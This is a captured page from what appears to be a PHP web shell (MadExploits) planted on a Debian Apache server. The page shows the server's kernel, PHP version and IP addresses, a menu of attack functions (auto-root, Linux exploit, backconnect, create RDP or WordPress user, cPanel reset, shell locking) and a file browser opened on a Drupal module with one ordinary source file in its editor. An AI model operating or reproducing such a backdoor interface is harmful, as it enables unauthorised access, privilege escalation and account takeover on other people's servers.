Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.218.128.229
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
views /
modules /
system /
[ HOME SHELL ]
Name
Size
Permission
Action
views_handler_argument_file_fi...
617
B
-rw-r--r--
views_handler_field_file.inc
1.62
KB
-rw-r--r--
views_handler_field_file_exten...
1.51
KB
-rw-r--r--
views_handler_field_file_filem...
1.13
KB
-rw-r--r--
views_handler_field_file_statu...
367
B
-rw-r--r--
views_handler_field_file_uri.i...
1.09
KB
-rw-r--r--
views_handler_filter_file_stat...
365
B
-rw-r--r--
views_handler_filter_system_ty...
510
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : views_handler_field_file_uri.inc
<?php /** * @file * Definition of views_handler_field_file_uri. */ /** * Field handler to add rendering file paths as file URLs instead of as internal file URIs. */ class views_handler_field_file_uri extends views_handler_field_file { function option_definition() { $options = parent::option_definition(); $options['file_download_path'] = array('default' => FALSE, 'bool' => TRUE); return $options; } function options_form(&$form, &$form_state) { $form['file_download_path'] = array( '#title' => t('Display download path instead of file storage URI'), '#description' => t('This will provide the full download URL rather than the internal filestream address.'), '#type' => 'checkbox', '#default_value' => !empty($this->options['file_download_path']), ); parent::options_form($form, $form_state); } function render($values) { $data = $values->{$this->field_alias}; if (!empty($this->options['file_download_path']) && $data !== NULL && $data !== '') { $data = file_create_url($data); } return $this->render_link($data, $values); } }
Close